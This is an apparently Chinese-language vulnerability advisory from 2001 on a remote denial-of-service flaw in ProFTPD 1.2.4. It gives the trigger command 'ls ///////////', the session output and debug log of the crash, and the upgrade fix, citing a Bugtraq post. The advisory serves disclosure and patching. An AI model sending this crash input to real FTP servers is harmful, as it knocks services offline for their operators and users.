ProFTPD 存在安全问题发布时间:2001-12-20 更新时间:2001-12-20 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 ProFTPD 1.2.4详细描述 ProFTPD在处理globbing的时候也存在类似wu-ftpd的问题,当请求ls /////////// 的命令时候,会导致段错误,使FTP服务程序断开连接。 测试代码 ftp> ls /////////// 200 PORT command successful. 150 Opening ASCII mode data connection for file list. 421 Service not available, remote server has closed connection ftp> 而出现的调试信息如下: dispatching PRE_CMD command 'LIST ///////////' to mod_core dispatching CMD command 'LIST ///////////' to mod_ls active data connection opened - local : 127.0.0.1:20 active data connection opened - remote : 127.0.0.1:1286 in dir_check_full(): path = '/', fullpath = '/home/ftp/'. ProFTPD terminating (signal 11) 解决方案 请升级到1.2.5RC1版本: http://www.proftpd.org 相关信息 Regards, Mattias surre1@hotmail.com 参考:http://archives.neohapsis.com/archives/bugtraq/2001-12/0196.html |
